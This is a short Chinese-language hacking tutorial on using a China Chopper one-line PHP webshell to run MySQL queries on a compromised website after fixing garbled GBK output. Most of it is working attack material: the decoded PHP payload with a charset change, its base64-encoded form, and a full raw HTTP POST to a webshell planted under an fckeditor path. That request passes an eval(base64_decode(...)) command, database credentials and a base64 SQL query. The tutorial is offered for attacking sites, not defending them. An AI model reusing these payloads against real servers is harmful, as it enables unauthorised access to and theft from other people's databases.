发现gbk等非gb2312的,用菜刀的一句话客户端工具连接后必然乱码,调整工具的编码方式没用,
chopper菜刀一句话木马操作mysql数据库乱码问题解决网站安全
。1.抓包base64解密:post变量中z0就是如下语句(没有红色的语句):
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];$sql=base64_decode($_POST["z5"]);$T=@mysql_connect($hst,$usr,$pwd);@mysql_select_db($dbn);@mysql_query("set names 'gbk'");$q=@mysql_query($sql);$i=0;while($col=@mysql_field_name($q,$i)){echo($col."\t|\t");$i%2b%2b;}echo("\r\n");while($rs=@mysql_fetch_row($q)){for($c=0;$c<$i;$c%2b%2b){echo(trim($rs[$c]));echo("\t|\t");}echo("\r\n");}@mysql_close($T);;echo("|<-");die();
2.重新加密后(注意+号已经被%2b, /被 %2f 代替了:
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pO0BteXNxbF9xdWVyeSgic2V0IG5hbWVzICdnYmsnIik7JHE9QG15c3FsX3F1ZXJ5KCRzcWwpOyRpPTA7d2hpbGUoJGNvbD1AbXlzcWxfZmllbGRfbmFtZSgkcSwkaSkpe2VjaG8oJGNvbC4iXHR8XHQiKTskaSsrO31lY2hvKCJcclxuIik7d2hpbGUoJHJzPUBteXNxbF9mZXRjaF9yb3coJHEpKXtmb3IoJGM9MDskYzwkaTskYysrKXtlY2hvKHRyaW0oJHJzWyRjXSkpO2VjaG8oIlx0fFx0Iik7fWVjaG8oIlxyXG4iKTt9QG15c3FsX2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7
3.没法用菜刀了,那就用自定义的post提交工具吧,如nc最原始了:
POST /fckeditor/xxx.php HTTP/1.1
Referer: http://xxx.com
Content-Type: application/x-www-form-urlencoded
User-Agent: User-Agent: Mozilla/4.0 (Windows NT 5.1) Firefox/3.0.0.1
Host: xxxxx.com
Content-Length: 1227
Cache-Control: no-cache
Cookie: __utma=70948559.2011506103.1300526684.1301244532.1301247546.6; __utmz=70948559.1300526684.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=155ec963c319dccb74e9751fa4c73300
fuck9518=@eval(base64_decode($_POST[chr(122).chr(48)]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pO0BteXNxbF9xdWVyeSgic2V0IG5hbWVzICdnYmsnIik7JHE9QG15c3FsX3F1ZXJ5KCRzcWwpOyRpPTA7d2hpbGUoJGNvbD1AbXlzcWxfZmllbGRfbmFtZSgkcSwkaSkpe2VjaG8oJGNvbC4iXHR8XHQiKTskaSsrO31lY2hvKCJcclxuIik7d2hpbGUoJHJzPUBteXNxbF9mZXRjaF9yb3coJHEpKXtmb3IoJGM9MDskYzwkaTskYysrKXtlY2hvKHRyaW0oJHJzWyRjXSkpO2VjaG8oIlx0fFx0Iik7fWVjaG8oIlxyXG4iKTt9QG15c3FsX2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7&z1=localhost&z2=localnewsssB&z3=local_ddd&z4=db_9518&z5=xxxxx
其中指定z5为sql语句的base64编码即可,